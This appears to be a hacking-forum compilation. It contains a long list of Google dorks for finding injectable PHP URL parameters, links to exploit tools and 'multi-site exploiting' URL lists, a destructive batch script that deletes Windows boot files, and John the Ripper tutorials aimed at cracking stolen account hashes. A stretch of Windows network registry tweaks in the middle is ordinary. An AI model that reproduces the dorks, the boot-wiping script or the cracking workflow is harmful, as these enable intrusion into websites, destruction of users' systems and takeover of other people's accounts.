allinurl:.php?file=
allinurl:*.php?file=
allinurl:.php?fileid=
allinurl:*.php?fileid=
allinurl:.php?file_id=
allinurl:*.php?file_id=
allinurl:.php?page=
allinurl:*.php?page=
allinurl:.php?pageid=
allinurl:*.php?pageid=
allinurl:.php?page_id=
allinurl:*.php?page_id=
allinurl:.php?pagenum=
allinurl:*.php?pagenum=
allinurl:.php?page_num=
allinurl:*.php?page_num=
allinurl:.php?cat=
allinurl:*.php?cat=
allinurl:.php?cat_id=
allinurl:*.php?cat_id=
allinurl:.php?catid=
allinurl:*.php?catid=
allinurl:.php?prod=
allinurl:*.php?prod=
allinurl:.php?prodid=
allinurl:*.php?prodid=
allinurl:.php?prod_id=
allinurl:*.php?prod_id=
allinurl:.php?product=
allinurl:*.php?product=
allinurl:.php?productid=
allinurl:*.php?productid=
allinurl:.php?product_id=
allinurl:*.php?product_id=
allinurl:.php?products_id=
allinurl:*.php?products_id=
allinurl:.php?userid=
allinurl:*.php?userid=
allinurl:.php?user_id=
allinurl:*.php?user_id=
allinurl:.php?showuser=
allinurl:*.php?showuser=
allinurl:.php?show_user=
allinurl:*.php?show_user=
allinurl:.php?username=
allinurl:*.php?username=
allinurl:.php?memberid=
allinurl:*.php?memberid=
allinurl:.php?member_id=
allinurl:*.php?member_id=
allinurl:.php?membernumber=
allinurl:*.php?membernumber=
allinurl:.php?member_number=
allinurl:*.php?member_number=

If anyone asks how to use these, they are not ready to use this

Have fun
I will post dos commands and stuff soon

Anonymous
We are legion
We do not forgive
We do not forget
Expect Us

Immortality
We are 1
We are None
United by 1
Divided by Zero
Bow Down To Us

C-Sploiter Final

A very good Exploiter

http://rapidshare.com/files/128202471/CSF.rar

Rar Pass:

http://www.imafia.net

13,000+ base urls for multi-site exploiting rs

http://rapidshare.com/files/115667429/urls.rar

WSTOOL : Web vulnerable scan tool

Web vulnerabilities scan tool - SQL injection -XSS Cross Site Scripting - 404/500 server error -Admin/Manage folder search - web-based or command-line scanner.

http://puzzle.dl.sourceforge.net/sourceforge/wstool/wstool_0.14001_en.zip

Make ur Internet n Bandwidth Rapid - Rapid Speeds 100% works

Here are Registry Tweaks and Scroll down to see Patches

1.Increase bandwidth by tweaking QoS in Windows XP Pro

The following tweak applies only to Windows XP Professional edition.

The default system behavior is that all 100% bandwidth is available, however, if there is a running application that indicates to the OS it needs to send high priority/real time data, then as long as it has the socket open, Windows XP will restrict “best effort” traffic to 80% of the bandwidth so that high priority traffic can be accommodated. Basically, applications can make this request to the operating system for QoS support using the QoS application programming interfaces (APIs) in Windows and this only applies if a specific app is requesting QoS.

If you'd like to change how much bandwidth is reserved for QoS (the default is 20% of the total bandwidth), do the following:

1. Make sure you're logged in as "Administrator" (not just any account with admin privileges).
2. Navigate to START>Run and type: gpedit.msc
3. Navigate to Local Computer Policy > Administrative Templates > Network > QOS Packet Scheduler
4. In the right window, double-click the limit reservable bandwidth setting
5. On the setting tab, check the enabled setting.
6. Where it says "Bandwidth limit %", change it to read 0 (or whatever percentage you want to reserve for high priority QoS data)
7. Click OK, close gpedit.msc

Under START > My Computer > My Network Connections > View Network Connections, right-click on your connection and under Properties (where it lists your protocols), make sure QOS Packet Scheduler is enabled.



The tweak desribed below helps boost priority for DNS & hostname resolution in general. What this means is, it helps web pages load faster, and has negligible effect on downloads (not counting the couple of ms gain with the host resolution at connect-time).

Applying this tweak assumes some proficiency in editing the Windows Registry using Regedit (Start > Run > type: regedit). As always, backup your Registry before making any changes so you can revert to the previous state if you don't like the results.


2.Host Resolution Priority Tweak
host name resolution priority
Windows 2k/XP

First, open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider



Note the following lines (all hex dwords):
Class = 008 (8) - indicates that TCP/IP is a name service provider, don't change.

LocalPriority = 1f3 (499) - local names cache
HostsPriority = 1f4 (500) - the HOSTS file
DnsPriority = 7d0 (2000) - DNS
NetbtPriority = 7d1 (2001) - NetBT name-resolution, including WINS

What we're aiming to do is increase the priority of the last 4 settings, while keeping their order. The valid range is from -32768 to +32767 and lower numbers mean higher priority compared to other services. What we're aiming at is lower numbers without going to extremes, something like what's shown below should work well:

Change the "Priority" lines to:
LocalPriority = 005 (5) - local names cache
HostsPriority = 006 (6) - the HOSTS file
DnsPriority = 007 (7) - DNS
NetbtPriority = 008 (8) - NetBT name-resolution, including WINS

Windows 9x/ME

The tweak is essentialy the same as in Windows 2000/XP, just the location in the Registry is slightly different. For a more detailed description see the Windows 2000/XP section above.

Open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\ServiceProvider

You should see the following settings:
Class=hex:08,00,00,00

LocalPriority=hex:f3,01,00,00
HostsPriority=hex:f4,01,00,00
DnsPriority=hex:d0,07,00,00
NetbtPriority=hex:d1,07,00,00

The "priority" lines should be changed to:
LocalPriority=hex:05,00,00,00
HostsPriority=hex:06,00,00,00
DnsPriority=hex:07,00,00,00
NetbtPriority=hex:08,00,00,00

Reboot for changes to take effect.


In addition to the tweaks already covered in Win 2k/XP Registry Tweaks and More Win 2k/XP Tweaks, the Windows XP Service Pack 2 introduces a few new issues covered in the article below. Please make sure you understand what you are doing before making any changes to your Operating System. Note the information below only applies to Windows XP Service Pack 2.



3.Remove the limit on TCP connection attempts

Windws XP SP2 introduces a few new twists to TCP/IP in order to babysit users and "reduce the threat" of worms spreading fast without control. In one such attempt, the devs seem to have limited the number of possible TCP connection attempts per second to 10 (from unlimited in SP1). This argumentative feature can possibly affect server and P2P programs that need to open many outbound connections at the same time.

Rant: The forward thinking of Microsoft developers here is that you can only infect 10 new systems per second via TCP/IP ?!?... If you also consider that each of those infected computers will infect 10 others at the same rate:
second 1: 1+10 computers
second 2: 10+10*10 computers (110 new ones)
second 3: 10+100*10 computers ( 1110 new ones)
second 4: 10+1000*10 computers (11110 new ones)
....
all the way to 10*60 + 10^60 computers in a single minute (that's a number with 60 digits, or it would far exceed Earth's population). Even if we consider that 90% of those computers are unreachable/protected, one would still reach ALL of them within a minute.

In other words, even though it is not going to stop worm spreading, it's going to delay it a few seconds, limit possible network congestion a bit, and limit the use of your PC to 10 connection attempts per second in the process ! I have no problem with the new default setting limiting outbound connection attempts. Still, users should have the option to easily disable or change this setting. I might be going out on a limb here, but ever since the introduction of Windows XP I can't help thinking that I dislike all the bult-in Windows "wisardry" in a sense that the system also limits user access. That irritating trend to ease the mental load on end users is somewhat insulting, considering that Windows is to make the more "intelligent" choice instead of the end user, as well as limit their access to tuning such settings...
End of rant.

With the new implementation, if a P2P or some other network program attempts to connect to 100 sites at once, it would only be able to connect to 10 per second, so it would take it 10 seconds to reach all 100. In addition, even though the setting was registry editable in XP SP1, it is now only possible to edit by changing it directly in the system file tcpip.sys. To make matters worse, that file is in use, so you also need to be in Safe mode in order to edit it.

You only need to worry about the number of connection attempts per second if you have noticed a slowdown in network programs requiring a number of connections opened at once. You can check if you're hitting this limit from the Event Viewer, under System - look for TCP/IP Warnings saying: "TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts". Keep in mind this is a cap only on incomplete outbound connect attempts per second, not total connections. Still, running servers and P2P programs can definitely be affected by this new limitation. Use the fix as you see fit.

To change or remove the limit, you can use the following program:

Event ID 4226 Patcher v2.11

http://www.speedguide.net/files/xp_sp2/EvID4226Patch211a-en.zip

- A patching program for removing or changing the limit imposed on connection attempts in SP2. The patcher has the ability to restore tcpip.sys back to the original... Still, you might want to back up tcpip.sys, use it at your own risk. The author of this patch can be reached @ http://www.lvllord.de/

4. Recommended settings for Windows 2000 / XP
Windows 2000 & XP, unlike NT supports large windows as described in RFC1323 ( the 'RcvWindow' has a maximum value of 2**30 rather than 64K), and includes some other improvements over its predecessors you can use to speed up any TCP/IP transfers. , the descriptions and other options are added to provide you with better understanding and enable you to customize your settings.

All the following entries, unless otherwise noted should be placed in the Windows 2000/XP Registry under the key

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

TCPWindowSize

The value of TCP Window in the Windows 2000 Registry is DWORD, representing number of bytes, with range from 0 to 2^30. The recommended values (in red) optimize TCP for any high speed Internet connection and work best in most cases, however if you'd like to use a custom value follow these guidelines:

For best results, the TCPWindow should be a multiple of MSS (Maximum Segment Size). MSS is generally MTU - 40, where MTU (Maximum Transmission Unit) is the largest packet size that can be transmitted. MTU is usually 1500 (1492 for PPPoE connections). To determine the MTU value of your ISP, check out the Advanced Registry Editing section of our site.

There are three places in the Windows 2000 Registry where you can add the TCP Window parameter.

HKLM/SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
GlobalMaxTcpWindowSize="256960" (DWORD, number of bytes) Valid range is from MSS to 2^30. Add the value as a decimal. Note: For best results RWIN has to be a multiple of MSS lower than 65535 times a scale factor that's a power of 2, i.e. 44 x 1460 = 64240 x 2^2 = 256960. If you choose to use a RWIN lower than 65535, you can simply make it multiple of MSS and turn scaling off (Tcp1323Opts=0)

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
TcpWindowSize="256960" (DWORD, number of bytes) Valid range is from MSS to 2^30. Add the value as a decimal. TcpWindowSize can also exist under TcpipParametersInterface - if added at this location, it overrides the global setting for this particular . Note (10/20/00): Seems MS has found another bug in Windows 2000, the TCPWindowSize should be configured with the global setting (GlobalMaxTcpWindowsSize) rather than this one - Q263088

Note: For best results RWIN has to be a multiple of MSS lower than 65535 times a scale factor that's a power of 2, i.e. 44 x 1460 = 64240 x 2^2 = 256960. If you choose to use a RWIN lower than 65535, you can simply make it multiple of MSS and turn scaling off (Tcp1323Opts=0)

Tcp1323Opts

Tcp1323Opts is a necessary setting in order to enable Large TCPWindow support as described in RFC 1323. Without this parameter, the TCPWindow is limited to 64K.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
Tcp1323Opts="1" (DWORD, recommended setting is 1. The possible settings are 0 - Disable RFC 1323 options, 1 - Window scaling but no Timestamp options, 3 - Window scaling and Time stamp options.)

Note: Tcp1323Opts="3" might help in some cases where there is increased packet loss, however generally you'll achieve better throughput with Tcp1323Opts="1", since Timestamps add 12 bytes to the header of each packet.

DefaultTTL

DefaultTTL determines the time in seconds and the number of hops a packet lives. While it does not directly affect speed, a larger value increases the amount of time it takes for a packet to be considered lost, discarded and retransmitted. A value that's too small can cause packets to be unable to reach distant servers at all.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
DefaultTTL="64" (DWORD, recommended setting is 64. Other settings that are widely used are 128 and 32)

EnablePMTUDiscovery

When set to 1 (True), TCP attempts to discover MTU automatically over the path to a remote host. Setting this parameter to 0 causes MTU to default to 576 which reduces overall performance over high speed connections. Note that this setting is different than our Windows 9x recommendation.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
EnablePMTUDiscovery="1" (DWORD - boolean, valid settings are 0-->False and 1-->True. Many connections perform better with this entry at 1, however, if you prefer to set your upstream to send fixed 1500 packets, you might want to use 0 instead). When set at 1, establishing connections and initial transfer speed might slow down a bit, however you will get better throughput if somewhere in the path large packets need to be fragmented.

EnablePMTUBHDetect

Setting this parameter to 1 (True) enables "black hole" routers to be detected, however it also increases the maximum number of retransmissions for a given segment. In most cases you'd want to keep BHDetect to 0 (False).

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
EnablePMTUBHDetect="0" (DWORD - boolean, valid settings are 0-->False and 1-->True. Recommended setting is 0)

SackOpts

This parameter controls whether or not SACK (Selective Acknowledgement) support is enabled, as specified in RFC 2018. SACK is especially important for connections using large TCP Window sizes.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SackOpts="1" (DWORD - boolean, recommended setting is 1. Possible settings are 0 - No Sack options or 1 - Sack Option enabled).

TcpMaxDupAcks

This parameter determines the number of duplicate ACKs that must be received for the same sequence number of sent data before "fast retransmit" is triggered to resend the segment that has been dropped in transit.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
TcpMaxDupAcks="2" (DWORD - range 1-3, recommended setting is 2).



Patches


This Includes

1. sguide_tweak_2k.zip
Description: Generic patch for Windows XP and Windows 2000 (all versions). This patch will optimize your TCP/IP Registry settings for high speed Internet connections. To install, extract the .inf file first, then double-click (or right-click on filename and choose install from the pull-down menu) and reboot for changes to take effect.

http://www.speedguide.net/files/sguide_tweak_2k.zip

2.sguide_tweak_2k_pppoe.zip
Description: Generic patch for Windows XP/2000 and DSL connections using PPPoE. This patch will optimize your TCP/IP Registry settings for high speed Internet connections. It is specifically designed for PPPoE DSL connections. To install, extract the .inf file first, then double-click (or right-click on filename and choose install from the pull-down menu) and reboot for changes to take effect.

http://www.speedguide.net/files/sguide_tweak_2k_pppoe.zip

3. winxp_dnscache.zip

Description: Patch Windows 2k/XP not to cache failed DNS entries. By default, when a DNS lookup fails (due to temporary DNS problems), Windows still caches the unsuccessful DNS query, and in turn fails to connect to a host regardless of the fact that the DNS server might be able to handle your lookup seconds later. This patch fixes the problem by configuring the DNS client to continue sending queries to an unresponsive network. To install, save to your HD, unzip the .reg file, then double-click the filename.

Web Patches - faster loading of Web Pages
The following patch increases Web page loading speed, by doubling the number of possible concurrent open connections. For example, imagine a web page has 20 images and some text - in order for your browser to get all these files, it opens 2 or 4 concurrent connections, depending on the Web server. Increasing the number of open connections allows for faster retrieving of the data. Please note that the patch sets some values outside of the HTML specs. If you decide to install it, backup your Registry first. Changes will take effect after you reboot. Download the patch appropriate for your OS:

OS: Windows 9x/ME

http://www.speedguide.net/files/sg_webtweak_9x.zip

OS: Windows 2K/XP/2k3

http://www.speedguide.net/files/sg_webtweak_2k.zip

TCP OPTIMISER
Description: The TCP Optimizer is a free, easy Windows program that provides an intuitive interface for tuning and optimizing your Internet connection. Just download and run, there is no installaion required. The program makes it easy to find the best MTU and RWIN values, test latency and tweak all the important broadband related registry parameters. The Optimizer can be helpful with tuning any Internet connection type, from dialup to Gigabit+

URL http://www.speedguide.net/files/TCPOptimizer.exe

Access Diver-Tutorial, Videotutorial

http://rapidshare.com/files/110803323/Access_Diver_Tutorial.rar

Password: www.imafia.net

Caecus tutorial, OCR cracking

This summary is not available. Please click here to view the post.

Learn how to Crack - The Complete Cracking

Basically this rar includes a number of files that walk u through the steps of cracking an actual program! ... Plus you get lots of cracking tools with this one rar file

Note: Read the rar comments for the password.

http://rapidshare.com/files/35301440/TCCG_MaxGrab.rar

Shutdown a computer forever

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Copy the code into TXT and save it as .Bat

Do not run the program on your computer.
If you did choose recovery mode using the WinXP CD ROM

JTR Decrypting Video Tutorial

http://rapidshare.com/files/118746650/JTR_Decrypting_Video_Tutorial.rar

JTR tutorial

Ok, this tutorial is about John the Ripper, often shortened to JTR. JTR is a password c*a* for UNIX style passwords. You will need JTR to c*a* accounts extracted from cc*ill.LOG's or passwd files. This tutor can be used by the novice user, but maybe the more experienced users can discover some new dimensions too.
The accounts which JTR can c*a* must have the following format:
Fabian:56FgemjhWD9g6
colsen:99lu/CUMikgxM
ibunton:52plhWx7Iv.Cg
tommyb:90rhlDur.3ofE
Minutolo:86c9kUFc/2qxE
schwange:92LsZO7AsKIZA
^^user^^:^^^^hash^^^^^
The "weird" characters after the ':' is called the hash. A hash is nothing more than a code/number generated from a string of text. These hashes can be c*a* with JTR. The DES hashes which are used in cc*ill.logs are always 13 chars long.
WORDLIST MODE
JTR has different c*a* modes. One of the fastest way is to use a wordlist. The wordlist has to be a single wordlist and NOT a combolist. To make your own single wordlist (text file containing one word per line), you could think of using dictionaries of different languages, familynames, petnames, movie names, etc. I will supply some links where you can find such wordlists.
To let JTR work with a wordlist you run JTR like this (in a command-window):
john -wordfile:WORDLIST.TXT PORN_ACCOUNTS.TXT
where PASSES.TXT is your wordlist file, and PORN_ACCOUNTS.TXT is the file containing the usernames and hashes like shown above.
You can do a more advanced way of wordlist c*a* by supplying a
-rules parameter like this:
john -wordfile:WORDLIST.TXT -rules PORN_ACCOUNTS.TXT
This mode will take some more time, but the chance to c*a* more accounts increases quite a lot.In this mode JTR will test each word in the wordlist including variations of that word, like adding a number before or after the word, removing vowels and other nifty tricks.
Here you have a screenshot if you start john c*a* with a wordlist:
Loaded 945 passwords with 97 different salts (Traditional DES [64/64 BS MMX])
forest5 (temptor)
tomato (marley)
guesses:2 time: 0:00:00:08 0% c/s:109080040 trying: aljarfa - alkamin
anubis (jbwein)
guesses:3 time: 0:00:00:23 1% c/s:109082277 trying: berozo - berryton
Session aborted

If JTR is busy, you can hit [space] to display the current status. As seen in the above screenshot, you will get a status line with the number of guesses so far, how long JTR has been running (days:hours:minutes:seconds), the progress indicator, the speed in combinations of login and password per second and the current password tries. If JTR c*a* an account it will show you the password first and between the ( ) the loginname. If you have enough passes and you want to quit JTR, use ctrl-break (do NOT press ctrl-c twice, because that will not save your results to JTR's history (.POT file) and the restore file). In windows I have the experience that CTRL-C will not save the session either. You have explicitly use the Ctrl-Break combination!
If you have aborted JTR and want to let JTR resume the c*a*, you can restore the interrupted session with this: john -restore
If you want to see which accounts JTR has been c*a*, you use the option -show: john -show PORN_ACCOUNTS.TXT
To save the c*a* accounts to a file, you can use the standard redirection: john -show PORN_ACCOUNTS.TXT > c*a*.txt
SINGLE c*a* MODE
This is the most easiest and probably fastest mode you should try first on your password files. It uses the logins to construct passwords with many different rules.
john -single PORN_ACCOUNTS.TXT
INCREMENTAL c*a* MODE
This is the most advanced and powerful c*a* mode of JTR. In this mode JTR will try every possible character combination. With the maximum length of passwords around 8, it will seem that JTR will never terminate his session. It will end eventually but it can take months, even years to complete it. JTR has some advanced methods when it comes to trying every possible character combination. It uses character frequency tables and stuff, to improve the chance of success.
There are different character sets which you can use. The charsets which are delivered with JTR are the following:
All : this character sets contains 95 different chars (all letters, numbers, chars like !@#$%^&*()_+)
Alpha : this character sets contains 26 different chars (a to z)
Digits : this character sets contains 10 different chars (0 to 9)
LanMan : this character sets contains 65 different chars, and is primarly used for c*a* LanMan passwords which are used by WindowsNT.
If you don't specify a , JTR will choose the default incremental mode which is 'All'.
john -i PORN_ACCOUNTS.TXT
john -i:digits PORN_ACCOUNTS.TXT
john -i:alpha PORN_ACCOUNTS.TXT
Some tips - some are advanced
1. If you alphabeticly sort your wordlist, JTR will be running a little faster. Another advantage of sorting is that JTR can detect dupes by himself.
2. Although the maximum length of the password is normally 8 chars, don't remove or truncate the words in the wordlist which are larger than 8 chars. The rest maybe needed by the -rules option (think of the vowel-removing rule). John is btw smart enough not to test two passwords again if the list is sorted.
3. JTR can make use of wildcards, such as:
john -wordfile:WORDLIST.TXT -rules accounts*.txt
It will load all accounts*.txt file and starts c*a* all the accounts in them.
4. The amount of different salts has effect on the speed of JTR. How more salts must be calculated, the slower JTR is. To speed up the whole process you can chose to let JTR try salts with passwords. To test salts with more than 5 passwords, you use the following options:
john -wordfile:WORDLIST.TXT -rules -salts:5 PORN_ACCOUNTS.TXT
To test the rest of the salts (those with less than 5 passwords), use -:
john -wordfile:WORDLIST.TXT -rules -salts:-5 PORN_ACCOUNTS.TXT
5. To have more than one session which you can restore, you can let the session be saved as by using the option -session:. To restore a specific session use the option -restore:. The status of a cancelled session can be watched by the option -status:
john -wordfile:WORDLIST.TXT -rules -session:firsttry PORN_ACCOUNTS.TXT
john -restore:firsttry
john -status:firsttry
6. If you have c*a* a lot of accounts, it can be more effective to make your own charset. Your custom made charset will not only contain the chars used in the c*a* passwords, but will determine the character frequencies too to make JTR more efficient and faster in c*a* passwords. To make your own charset the following steps have to be made:
a) Make your own charset
john -makechars:THEBEST.CHR PORN_ACCOUNTS.TXT
Loaded 73618 plaintexts
Generating charsets... 1 2 3 4 5 6 7 8 DONE
Generating c*a* order... DONE
Successfully written charset file: thebest.chr (65 characters)
Edit the config file JOHN.CONF
- search for "[Incremental:All]" and you will see a section like this:
# Incremental modes
[Incremental:All]
File = $JOHN/all.chr
MinLen = 0
MaxLen = 8
CharCount = 95
- here you can add your own section (the CharCount will be given by JTR if you created a custom charset) to the config file
[Incremental:THEBEST]
File = $JOHN/THEBEST.CHR
MinLen = 3
MaxLen = 8
CharCount = 65
c) Now you can run JTR with -i:THEBEST

Easier JTR tut

ou can download JTR at [url="http://www.openwall.com/john"]http://www.openwall.com/john[/url] if you haven't it yet !

Once downloaded, unzip it in a directory you can find easily, for example :

c:\john\

In the john folder, you will find two sub-folders :
doc and run

in which you can find the executable

[codebox]john-386.exe or john-mmx.exe[/codebox]
.
Now you put the passwords you wanna crack in a text file (ex: pass.txt) like this :

[codebox]username:password[/codebox]


Let's begin !

I) Modes

1) Single

This mode tests all the most used combinations, it works fine and lasts just a few seconds. Try this one first. 8)

syntax :

[codebox]john -single pwdfile.txt[/codebox]


2) Word list

You can download good wordlists on [url="http://openwall.com"]http://openwall.com[/url] or by googling a bit...

syntax :

[codebox]john -wordlist:list pwdfile.txt[/codebox]

example :

[codebox]john -wordlist:C:\dico.txt pass.txt[/codebox]

3) Brute Force mode

Like written in the title this mode will brute force the pass, so it can last two mins. as well as centuries...

syntax :

[codebox]john -incremental:type pwdfile.txt[/codebox]


Type variable can be :

all
to test letters+numbers+special chars. or

alpha
to test only the letters or

digits
to test only the numbers.

example :

[codebox]john -incremental:alpha pass.txt[/codebox]


II) Go further

If you're lazy , you can use -w instead of -wordlist and -i instead of
-incremental.
Example :

[codebox]john -i:all pass.txt[/codebox]


JTR has a default wordlist (password.lst)
example :

[codebox]john -w:password.lst pass.txt[/codebox]

john the ripper simple tut

I wrote this tutorial as best I could to try to explain to the newbie how to operate JTR. Remember, this is a newbie tutorial, so I wont go into detail with all of the features. JTR is a program that decyrpts Unix passwords using DES (Data Encryption Standard).

Do these steps

Step 1: Download JTR.

Step 2: Extract JTR. In windows use winzip. In unix type

tar -xzf john-1.6.tar.gz


Step 3: In windows open the command prompt. Go to the Start menu, click Run, type 'command' (no quotes) and press enter.

You with me? Good. Go to whatever directory to have JTR in. Type 'john' and press enter. A whole list of options will come up:


John the Ripper Version 1.6 Copyright © 1996-98 by Solar Designer


Usage: /WINDOWS/DESKTOP/JTR/JOHN-16/RUN/john [OPTIONS] [PASSWORD-FILES]
-single "single crack" mode
-wordfile:FILE -stdin wordlist mode, read words from FILE or stdin
-rules enable rules for wordlist mode
-incremental[:MODE] incremental mode [using section MODE]
-external:MODE external mode or word filter
-stdout[:LENGTH] no cracking, just write words to stdout
-restore[:FILE] restore an interrupted session [from FILE]
-session:FILE set session file name to FILE
-status[:FILE] print status of a session [from FILE]
-makechars:FILE make a charset, FILE will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[-]LOGIN|UID[,..] load this (these) user(s) only
-groups:[-]GID[,..] load users of this (these) group(s) only
-shells:[-]SHELL[,..] load users with this (these) shell(s) only
-salts:[-]COUNT load salts with at least COUNT passwords only
-format:NAME force ciphertext format NAME
(DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL enable memory saving, at LEVEL 1..3



You wont need most of these options. In fact, you don't really need any of these options. You can simply type 'john [filename]'. The filename must include the .txt extension. This is the regular crack. It will use bruteforce to decrypt all of the passwords in the file. If you're an impatient ass you can use a word list. This is not as effective but it's quicker (more on that later).

How to make a crackable file: Let's say that for some reason you have a DES encrypted password but no file. If you want to crack it (why else would you be here?) you need to make your own file. Just create a text file and paste in the password. Now put a username (just any old name will do) in front of it with a colon separating the two. It should look something like this:

User:gyuJo098KkLy9


Save the file as crackme.txt (just an example) and go to the prompt and type 'john crackme.txt' (no quotes obviously). Now you just have to wait.

Options:
Here are a list of the options and what they do.

-single: Single crack mode. This is only recommended for weak passwords as it includes only a few rules and a small wordlist.

Usage: john -single crackme.txt


-wordfile: Uses a wordlist (basically a dictionary attack). What this does is tries every word in the list until it finds a match or you reach the end of the list. This is quicker than the default (bruteforce) attack, but I don't recommend this because it doesn't always find a match. More notes on wordlists below.

Usage: john -wordfile:password.lst crackme.txt


-rules: Lets you define the rules for using wordlists. I don't use wordlists, so if you want to use this option I wont help you. Ok, ok, I'm just lazy. Shoot me.

-incremental: I like this method. It allows you to do a bruteforce attack
under certain modes.

Usage: john -incremental:alpha crackme.txt (only letters)
john -incremental:digits crackme.txt (only numbers)
john -incremental:lanman crackme.txt (letters, numbers, and some special characters)
john -incremental:all crackme.txt (all characters)


-external: This is a little complicated, so if you are lame don't mess with it. Basically this calls the options that are defined in the configuration settings. You can change these yourself, but I wouldn't recommend it unless you know what you're doing. No, I wont tell you how, go away.

Usage: john -external:[MODE] crackme.txt (replace MODE with whatever the
name of your mode is).


-restore: Ok, let's say that you need to stop the crack in the middle. Press crtl+break. A file will be created in the JTR directory named 'restore' (no quotes doofus, and yes, no file extention). You can start the crack back up from that restore point. If you used the-session option you probably have a different filename.

Usage: john -restore:restore


-session: Use this if you know that you will have to stop JTR in the middle of a crack. It allows you to create a new file that holds the data of your session. You can then restore your session later.

Usage: john -session:[save to filename] crackme.txt


-status: Shows how far you got before stoping a crack (provided you used the -session option).

Usage: john -status:[filename]


-show: Shows how many passwords have been cracked in a file and how many are left.

Usage: john -show crackme.txt


-test: Shows how fast JTR will work on your computer.

Usage: john -test


-users: Cracks the password only for the user or users you tell it to.

Usage: john -users:User crackme.txt


-groups: Cracks the passwords only for the group or groups you tell it to.

Usage: john -group:lamers crackme.txt


-shells: Cracks the passwords only for the shell or shells you tell it to.

Usage: john -shells:shelly crackme.txt


-salts: Cracks the salts that have at least the number of passwords you specify.

Usage: john -salts:2 crackme.txt


-format: JTR can decrypt many from many different formats, not just DES (but this is the most widely used one). Use this to force JTR to try a certain format.

Usage: john -format:DES crackme.txt (force DES)
john -format:BSDI crackme.txt (force BSDI)
john -format:MD5 crackme.txt (force MD5)
john -format:BF crackme.txt (force BF)
john -format:AFS crackme.txt (force AFS)
john -format:LM crackme.txt (force LM)


-savemem: this tells JTR to automatically save your process at whatever
level you specify from one to three.

Usage: john -savemem:1 crackme.txt (save at level 1)
john -savemem:2 crackme.txt (save at level 2)
john -savemem:3 crackme.txt (save at level 3)



How to use a wordlist with JTR: I'll assume you already have a wordlist in the JTR directory (it comes with password.lst, if you want to make your own I'll tell you how later). Go to the prompt and type 'john -wordfile:password.lst crackme.txt' (no quotes, damnit). If the password is in the wordlist, it will work. Otherwise, you deserve it for
using a wordlist when you have bruteforce capabilities, shame on you.

How to create a wordlist to use with JTR: First I will include a few lines of the wordlist supplied with JTR:

#!comment: Common passwords, compiled by Solar Designer.
12345
abc123
password
passwd
123456


The top line is a comment (duh). If you want to make a comment in your wordlist just follow the example. The other lines are passwords that the program will try when you use the wordlist. Put each password on a new line. In the event that you are too lazy to write your own wordlist you can download one (once again, I'm far too lazy to give you a link). It may or may not already be the right file format (.lst). If it isn't, just go to the prompt. Assuming the filename is lazy.txt, type 'rename lazy.txt lazy.lst'

Piping Output: Remember the -show option? You can get JTR to save that
output to a file. Just type 'john -show crackme.txt > crackinfo.txt'

There's my guide. I have an FAQ below:

Q: Can I mix options?
A: Yes, certain options can be mixed. You can mix options as long asthey don't clash. Play around with it a while.

Q: What does "Loaded 0 passwords" mean?
A: There was a problem with either your password file or the syntax of your command. If you force BF decryption when your file has DES encryption it wont work. If your password file isn't made right it wont work.

Q: What does "Password files required, but none specified" mean?
A: Can you read? You can't just tell JTR to crack, you need to give it a file.

Q: What does "Unknown cyphertext format name requested" mean?
A: When you use the -format option you need to check that you typed the name of the format correctly.

Q: How come when I typed 'john -users: login|uid crackme.txt' (which by the way is the usage shown in the list of option by JTR) I received this error:
Option requires a parameter: "-users:"
Bad command or file name
A: The piping symbol you used (|) can mean two different things. In this case in means 'or'. You're supposed to use login OR uid. When you type it in a dos window, you are running two separate commands.

Q: Can I speed up the bruteforce?
A: Sure, just toss that old ass box of yours and get a new one.

John32, GUI for JTR

http://rapidshare.com/files/110796164/John32.rar

John the ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

http://www.openwall.com/john/